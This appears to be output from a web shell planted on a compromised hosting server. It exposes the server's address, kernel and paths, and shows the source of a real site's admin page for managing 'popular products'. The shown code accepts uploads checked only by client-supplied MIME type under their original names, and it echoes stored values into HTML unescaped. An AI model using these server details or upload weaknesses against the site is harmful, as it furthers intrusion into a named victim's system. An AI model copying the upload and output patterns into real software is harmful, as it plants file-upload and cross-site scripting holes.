SkidSec WebShell

Server Address : 2a02:4780:a:760:0:37cc:13e2:3

Web Server : LiteSpeed

Uname : Linux uk-fast-web660.main-hosting.eu 5.14.0-570.55.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Oct 21 05:27:51 EDT 2025 x86_64

PHP Version : 7.4.33



Current Path : /home/u936121314/domains/acoverseas.com/public_html/admin/



Current File : /home/u936121314/domains/acoverseas.com/public_html/admin/manage_popular.php
<?php
require 'top.inc.php';
$msg='';
$title='';
$description='';
$image='';
$link='';
$sort_order='0';
$status='1';
$image_required='required';

if(isset($_GET['id']) && $_GET['id']!=''){
    $image_required='';
    $id = get_safe_value($conn, $_GET['id']);
    $res= mysqli_query($conn,"select * from popular_products where id='$id'");
    $check=mysqli_num_rows($res);
    if($check>0){
        $row=mysqli_fetch_assoc($res);
        $title=$row['title'];
        $description=$row['description'];
        $image=$row['image'];
        $link=$row['link'];
        $sort_order=$row['sort_order'];
        $status=$row['status'];
    }
    else{
        echo "<script>window.location.href='popular.php';</script>";
        header('Location:popular.php');
        die();
    }
}

if(isset($_POST['submit'])){
    $title = get_safe_value($conn, $_POST['title']);
    $description = get_safe_value($conn, $_POST['description']);
    $link = get_safe_value($conn, $_POST['link']);
    $sort_order = intval($_POST['sort_order']);
    $status = isset($_POST['status']) ? 1 : 0;

    if($_FILES['image']['type']!='' && ($_FILES['image']['type']!='image/png' && $_FILES['image']['type']!='image/jpg' && $_FILES['image']['type']!='image/jpeg')){
        $msg = "Please select only PNG/JPG/JPEG Formats";
    }

    if($msg==''){
        if(isset($_GET['id']) && $_GET['id']!=''){
            if($_FILES['image']['name']!=''){
                $image=rand(111111111,999999999).'_'.$_FILES['image']['name'];
                move_uploaded_file($_FILES['image']['tmp_name'],SERVER_PATH."/images/others/".$image);
                $update_sql="update popular_products set title='$title',description='$description',image='$image',link='$link',sort_order='$sort_order',status='$status' where id='$id'";
            }
            else{
                $update_sql="update popular_products set title='$title',description='$description',link='$link',sort_order='$sort_order',status='$status' where id='$id'";
            }
            mysqli_query($conn,$update_sql);
        }
        else{
            $image=rand(111111111,999999999).'_'.$_FILES['image']['name'];
            move_uploaded_file($_FILES['image']['tmp_name'],SERVER_PATH."/images/others/".$image);
            mysqli_query($conn,"insert into popular_products (title, description, image, link, sort_order, status) values('$title', '$description','$image', NULLIF('$link',''), '$sort_order', '$status')");
            $id=mysqli_insert_id($conn);
        }
        echo "<script>window.location.href='popular.php';</script>";
        header('Location:popular.php');
        die();
    }
}
?>

<div class="content pb-0">
    <div class="animated fadeIn">
        <div class="row">
            <div class="col-lg-12">
                <div class="card">
                <div class="card-header"><strong>Popular Product</strong><small> Form</small></div>
                    <form method="post" enctype="multipart/form-data">
                        <div class="card-body card-block">
                            <div class="form-group">
                                <label for="title" class=" form-control-label">Title</label>
                                <input type="text" name="title" placeholder="Enter Title" class="form-control" required value="<?php echo $title?>">
                            </div>
                            <div class="form-group">
                                <label for="description" class=" form-control-label">Description</label>
                                <input type="text" name="description" placeholder="Enter Description" class="form-control" required value="<?php echo $description?>">
                            </div>
                            <div class="form-group">
                                <label for="link" class=" form-control-label">Link (optional)</label>
                                <input type="text" name="link" placeholder="Enter Link URL" class="form-control" value="<?php echo $link?>">
                            </div>
                            <div class="form-group">
                                <label for="sort_order" class=" form-control-label">Sort Order</label>
                                <input type="number" name="sort_order" placeholder="0" class="form-control" value="<?php echo $sort_order?>">
                            </div>
                            <div class="form-group">
                                <div class="form-check">
                                  <input class="form-check-input" type="checkbox" name="status" id="status" <?php echo $status? 'checked':''; ?>>
                                  <label class="form-check-label" for="status">
                                    Active
                                  </label>
                                </div>
                            </div>
                            <div class="form-group">
                                <div class="row" id="image_box">
                                    <div class="col-lg-6">
                                        <label for="image" class=" form-control-label">Image</label>
                                        <input type="file" name="image" class="form-control" <?php echo $image_required?> >
                                    </div>
                                    <?php 
                                        if($image!=''){
                                            echo '<div class="col-lg-3">
                                                    <a target="_blank" href="'.SITE_PATH."/images/others/".$image.'">
                                                        <img src="'.SITE_PATH."/images/others/".$image.'" alt="">
                                                    </a>
                                                  </div>';
                                        }
                                        ?>
                                </div>
                            </div>
                            <button name="submit" type="submit" class="btn btn-lg btn-info btn-block">
                                <span id="payment-button-amount" >Submit</span>
                            </button>
                            <div class="feild_error"><?php echo $msg; ?></div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>
<?php
require 'footer.inc.php';?>